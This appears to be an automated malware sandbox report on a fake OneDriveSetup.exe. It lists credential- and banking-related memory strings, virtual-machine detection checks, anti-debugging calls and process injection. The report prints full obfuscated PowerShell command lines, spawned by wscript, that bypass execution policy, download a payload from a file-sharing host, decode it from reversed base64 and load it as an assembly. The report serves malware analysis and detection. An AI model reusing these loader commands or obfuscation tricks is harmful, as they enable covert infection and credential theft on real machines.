                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: OneDriveSetup.exe, 00000006.00000002.2693892304.000000000693B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vboxtray
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q*C:\windows\System32\Drivers\vmmousever.dll
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009EBA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vmtoolsd
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C6B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q)C:\windows\System32\Drivers\VBoxMouse.sys
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009F16000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeAPI call chain: ExitProcess graph end nodegraph_6-33323
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0C419578 LdrInitializeThunk,6_2_0C419578
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0040ADB0 GetProcessHeap,HeapFree,6_2_0040ADB0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040E61C
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00416F6A
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 6_2_004123F1 SetUnhandledExceptionFilter,6_2_004123F1
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: amsi64_8064.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8064, type: MEMORYSTR
                  Bypasses PowerShell execution policy
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 400000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 401000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 41B000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 422000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 426000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\OneDriveSetup.exe base: 92A008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\OneDriveSetup.exe "C:\Windows\SysWOW64\OneDriveSetup.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoichbc3rysw5nxsr2rxjcb1nluhjlzkvyzu5drslbmswzxssnwcctsm9pbicnksggkcgnruliaw1hz2vvcmwnkycgpsb6tnfodhrwczovlzmxmduuzmlszw1hawwuy29tlycrj2fwas9mawxll2dldd9mawxla2v5pxnovfbiyknqwdhvlwxpdenxsexhnl8ween5lxhsnhruegxbvmjrotutzhzpves1y0fsyu5kuwpiyjntzxhmd1f6s21uwgcmc2tpchjlzz10cnvljnbrx3zpzd1ljysnmdewotyzogm5ymziotu3mtcnkyczmjuzmtmwowi1zmy3yyb6tne7rulid2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddtfsuhpbwfnzuj5dgvzid0grulid2viq2xpzw50lkrvd25sb2fkrgf0yshfsuhpbwfnzvvybck7ruliaw1hz2vuzxgnkyd0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcoruliascrj21hz2vcexrlcyk7rulic3rhcnrgbgfnid0gek5xpdxcqvnfnjrfu1rbulqnkyc+pnpocttfsugnkydlbmrgbgfnid0gek5xpdxcqvnfnjrfru5epj56tne7rulic3qnkydhcnqnkydjbmrleca9ievjsgltywdlvgv4dc5jbmrlee9mjysnkevjshn0yxj0rmxhzyk7rulizw4nkydksw5kzxggpsbfsuhpbwfnzvrlehqusw5kzscrj3hpjysnzihfsuhlbicrj2rgbgfnkttfsuhzdgfydeluzgv4ic1nzsawic1hbmqgrulizw5ksw5kzxgglwd0ievjshn0yxj0sw5kzxg7rulic3rhcnrjbmrlecarpsbfsuhzdgfydezsywcutgvuz3roo0vjsgjhc2u2nexlbmd0aca9ievjsgvuzeluzgv4ic0grulic3rhcnrjbmrledtfsuhiyxnlnjrdb20nkydtyw5kid0gruliaw1hz2vuzxh0lln1ynn0cmluzygnkydfsuhzdgfydeluzgv4lcbfsuhiyxnljysnnjrmzw5ndggpo0vjsgjhc2u2nfjldmvyc2vkid0gjysnlwpvaw4gkevjsgjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbpveygrm9yrwfjac1pymply3qgeybfsuhfih0pwy0xli4tjysnkevjsgjhc2u2nenvbw1hbmqutgvuz3rokv07rscrj0liy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhfsugnkydiyxnljysnnjrszxzlcnnlzck7rulibg9hzgvkqxnzzw1ibhkgpsbbuycrj3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkevjsgnvbw1hbmqnkydcexrlcyk7rulidmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzch6tnfwqul6tnepo0vjshzhau1ldghvzc5jbnzva2uorulibnvsbcwgqch6tnf0ehqucnnlzy95zicrj2cnkycvdwuucmvsbg9ydycrj3noc3vwlnynkydicy8vonankyd0dggnkyd6tnesihpocwrlc2f0jysnaxzhzg96tnesihpocwrlc2enkyd0axzhzg96jysntnesihpojysncwrlc2f0axzhzg96tnesjysnihpocwrlc2f0axzhzg96tnesihpoctenkyd6tnesihpocu9uzuryaxzlu2v0dxb6tnesihpocwrlc2f0axzhzg96tnesihpocwrlc2f0axzhzg96tnesek5xzgvzyxrpdmfkb3pocsx6tnfkjysnzxnhdgl2ywrvek5xlhpocwrlc2f0axzhjysnzg96tnesek5xmxpocsx6tnfkzxmnkydhdccrj2l2ywrvek5xksk7jykgic1dukvqbgfjzsd6tnenlftdaefsxtm5ic1yzxbsqwnlichbq2hbul02ostbq2hbul03mytbq2hbul03miksw0noqvjdmzytcmvwbefjzsaow0noqvjdnzkrw0noqvjdodqrw0noqvjdnzaplftdaefsxteynckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ". ( ([string]$verbosepreference)[1,3]+'x'-join'')( (('eihimageurl'+' = znqhttps://3105.filemail.com/'+'api/file/get?filekey=shtphbcpx8o-lotcqhlg6_0xcy-xl4tnxlavbq95-dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c znq;eihwebclient = new-object system.net.webclient;eihimagebytes = eihwebclient.downloaddata(eihimageurl);eihimagetex'+'t = [system.text.encoding]::utf8.getstring(eihi'+'magebytes);eihstartflag = znq<<base64_start'+'>>znq;eih'+'endflag = znq<<base64_end>>znq;eihst'+'art'+'index = eihimagetext.indexof'+'(eihstartflag);eihen'+'dindex = eihimagetext.inde'+'xo'+'f(eihen'+'dflag);eihstartindex -ge 0 -and eihendindex -gt eihstartindex;eihstartindex += eihstartflag.length;eihbase64length = eihendindex - eihstartindex;eihbase64com'+'mand = eihimagetext.substring('+'eihstartindex, eihbase'+'64length);eihbase64reversed = '+'-join (eihbase64command.tochararray() otf foreach-object { eih_ })[-1..-'+'(eihbase64command.length)];e'+'ihcommandbytes = [system.convert]::frombase64string(eih'+'base'+'64reversed);eihloadedassembly = [s'+'ystem.reflection.assembly]::load(eihcommand'+'bytes);eihvaimethod = [dnlib.io.home].getmethod(znqvaiznq);eihvaimethod.invoke(eihnull, @(znqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'znq, znqdesat'+'ivadoznq, znqdesa'+'tivadoz'+'nq, zn'+'qdesativadoznq,'+' znqdesativadoznq, znq1'+'znq, znqonedrivesetupznq, znqdesativadoznq, znqdesativadoznq,znqdesativadoznq,znqd'+'esativadoznq,znqdesativa'+'doznq,znq1znq,znqdes'+'at'+'ivadoznq));') -creplace'znq',[char]39 -replace ([char]69+[char]73+[char]72),[char]36-replace ([char]79+[char]84+[char]70),[char]124))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liaoichbc3rysw5nxsr2rxjcb1nluhjlzkvyzu5drslbmswzxssnwcctsm9pbicnksggkcgnruliaw1hz2vvcmwnkycgpsb6tnfodhrwczovlzmxmduuzmlszw1hawwuy29tlycrj2fwas9mawxll2dldd9mawxla2v5pxnovfbiyknqwdhvlwxpdenxsexhnl8ween5lxhsnhruegxbvmjrotutzhzpves1y0fsyu5kuwpiyjntzxhmd1f6s21uwgcmc2tpchjlzz10cnvljnbrx3zpzd1ljysnmdewotyzogm5ymziotu3mtcnkyczmjuzmtmwowi1zmy3yyb6tne7rulid2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddtfsuhpbwfnzuj5dgvzid0grulid2viq2xpzw50lkrvd25sb2fkrgf0yshfsuhpbwfnzvvybck7ruliaw1hz2vuzxgnkyd0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcoruliascrj21hz2vcexrlcyk7rulic3rhcnrgbgfnid0gek5xpdxcqvnfnjrfu1rbulqnkyc+pnpocttfsugnkydlbmrgbgfnid0gek5xpdxcqvnfnjrfru5epj56tne7rulic3qnkydhcnqnkydjbmrleca9ievjsgltywdlvgv4dc5jbmrlee9mjysnkevjshn0yxj0rmxhzyk7rulizw4nkydksw5kzxggpsbfsuhpbwfnzvrlehqusw5kzscrj3hpjysnzihfsuhlbicrj2rgbgfnkttfsuhzdgfydeluzgv4ic1nzsawic1hbmqgrulizw5ksw5kzxgglwd0ievjshn0yxj0sw5kzxg7rulic3rhcnrjbmrlecarpsbfsuhzdgfydezsywcutgvuz3roo0vjsgjhc2u2nexlbmd0aca9ievjsgvuzeluzgv4ic0grulic3rhcnrjbmrledtfsuhiyxnlnjrdb20nkydtyw5kid0gruliaw1hz2vuzxh0lln1ynn0cmluzygnkydfsuhzdgfydeluzgv4lcbfsuhiyxnljysnnjrmzw5ndggpo0vjsgjhc2u2nfjldmvyc2vkid0gjysnlwpvaw4gkevjsgjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbpveygrm9yrwfjac1pymply3qgeybfsuhfih0pwy0xli4tjysnkevjsgjhc2u2nenvbw1hbmqutgvuz3rokv07rscrj0liy29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzyhfsugnkydiyxnljysnnjrszxzlcnnlzck7rulibg9hzgvkqxnzzw1ibhkgpsbbuycrj3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkevjsgnvbw1hbmqnkydcexrlcyk7rulidmfptwv0ag9kid0gw2rubglilklplkhvbw